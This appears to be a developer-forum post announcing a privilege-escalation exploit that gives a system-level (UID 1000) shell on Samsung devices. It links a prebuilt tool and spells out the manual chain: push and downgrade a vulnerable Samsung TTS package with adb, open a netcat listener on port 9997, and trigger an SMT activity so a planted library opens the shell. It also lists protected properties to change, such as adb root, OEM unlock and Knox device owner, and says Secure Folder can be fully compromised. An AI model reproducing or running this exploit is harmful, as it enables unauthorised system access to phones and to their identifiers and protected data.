System Shell Exploit - ALL Samsung Mobile Devices NO BL UNLOCK REQUIRED.
THIS IS ACTIVELY IN DEVELOPMENT - Our goal is to make it more user friendly. and easier to use, so please note things will change and updates will come at any given time, and there is almost certainly bugs to be found and encountered along the...
forum.xda-developers.com
THIS IS ACTIVELY IN DEVELOPMENT - Our goal is to make it more user friendly. and easier to use, so please note things will change and updates will come at any given time, and there is almost certainly bugs to be found and encountered along the way during this, so if you find issues, just let us know here or in support chat, we are VERY active, and can usually get back to you in a few mins. I Will be dynamically updating this post as things progress, keeping it up-to-date with our current progress.
--UPDATED 01/20/2023: 1:20PM CST PROJECT VERSION 4.5 -- (Fixed Port issues) --
Also confirmed working on Watch.. as mentioned, here.
This is an EXPLOIT to get a System based shell (UID 1000) on ANY Samsung Mobile Device. No clue if or when it will be patched, but has worked on every single Samsung Device tested so far.
THIS IS THE EQUILIVELENT OF DOING su system but this DOES NOT invoke or need "su" in any way.
This DOES NOT trip Knox.
This DOES NOT give you ROOT (UID 0)
This DOES NOT directly unlock your bootloader, although you may be able to find a way to do so using this exploit as a tool.
If you use this for your own works, Please give credit.
Next best thing to root on devices without BootLoader Unlock Option.
Cool things that work:
Ability to cd to /data/fota and remove updates before they install - Access to most of /efs /efs/imei /efs/sec_efs /efs/FactoryApp - Access to most of /data /data/system /data/user/0/ANY_SYSTEM_APP - The "Insthk" bin becomes useable, - Secure Folder/Separated Apps becomes COMPLETELY compromised if you also install the POC in it (UID 150_system) - start IOTHidden Menu, DM Mode, Service Mode, Multiple Debugging and hidden menus as well as preconfig in system context- Change many protected props, such as: setprop persist.service.adb.root 1 setprop service.adb.root 1 setprop sys.hidden.otatest 1 setprop sys.hiddenmenu.enable 1 setprop persist.sys.knox.device_owner true setprop persist.sys.usb.qxdm.debug 1 setprop sys.usb.qxdm.debug 1 setprop presist.service.adb.enable 1 setprop persist.sys.usb.qxdm.debug 1 setprop service.adb.enable 1 setprop persist.rollback.is_test true setprop sys.oem_unlock_allowed 1 aswell as quite a bit more.
Note* You need to be on Wifi or Hotspot to set this up.
Its fairly simple, a Typical Local Privilege escalation.
The Easy Way - Note, This could trigger some AV's due to embedded ADB and adb dlls, as mentioned in this comment.
You may also find the source and prebuilts on my github, here.
Step 1 - Download "Komraids System Shell.zip", (attached is the latest version) and extract anywhere on desktop. Install K0mraids POC.apk, Open atleast one time. Reboot.
Step 2 - Ensure USB Debugging is ON, and computer is authorized. Also make sure power saving is OFF.
Step 3 - When device is fully rebooted and unlocked, run systemshell.exe
Step 4 - You should now be in a shell with UID 1000. Enjoy. Be careful with what you mess with.
Things to note: The.exe only needs to be run once after each reboot, you can use it if you prefer, or if you are having issues here or want to manually open a system shell yourself, Check out "How it works?" below.
**You MUST downgrade SMT (Samsung TTS) on EVERY reboot**
How it works? (stuff for security researchers, devs etc)
Step 1 - Install the included "komraids_POC.apk" to the device and make sure to open it and let it load at least one time, then push the included "samsungTTSVULN2.apk" to /data/local/tmp (adb push samsungTTSVULN2.apk /data/local/tmp) -> chmod 777 /data/local/tmp/samsungTTSVULN2.apk >>> I advice disabling all battery optimizations for Samsung TTS and Shell, otherwise, it cuts off the shell from time to time.
Step 2 - Make sure ADB is on, Device connected to wifi and authorized and all power saving is off (as mentioned above) Reboot device. This will load our lib on reboot since TTS loads all native libs on reboot.
Step 4 - When device reboots, run this command from ADB. adb shell pm install -r -d -f -g --full --install-reason 3 --enable-rollback /data/local/tmp/samsungTTSVULN2.apk ---> it will return "Success" when done.
Step 5 - Now, open two shells, (OR, See NOTE* below to use App Manager) in the first, do nc -lp 9997 & in the second, do am start -n com.samsung.SMT/.gui.DownloadList -> Look back at the first shell., it should have opened into a new system (UID 1000) shell.
**You MUST downgrade SMT (Samsung TTS) on EVERY reboot**
SMT has a receiver that blindly accepts stuff, so a carefully crafted apk (Our "komraids_POC_v1.5.apk") can trick it into loading our neat lib which opens a shell for us on localhost port 9997!
SOURCE - on GitHub, here.
Use logcat | grep -i mercury to debug if lib is loaded or not.
NOTE: You can use something like AppManager, seen here, or another App installer/manager to launch the SMT activity in step 5, make a shortcut to it on your home screen for easy of access if you have issues, give this a go instead of using two shells, only use one for the nc -lp 9997 part and App MAnager to launch activity. .
You are now UID 1000. Enjoy.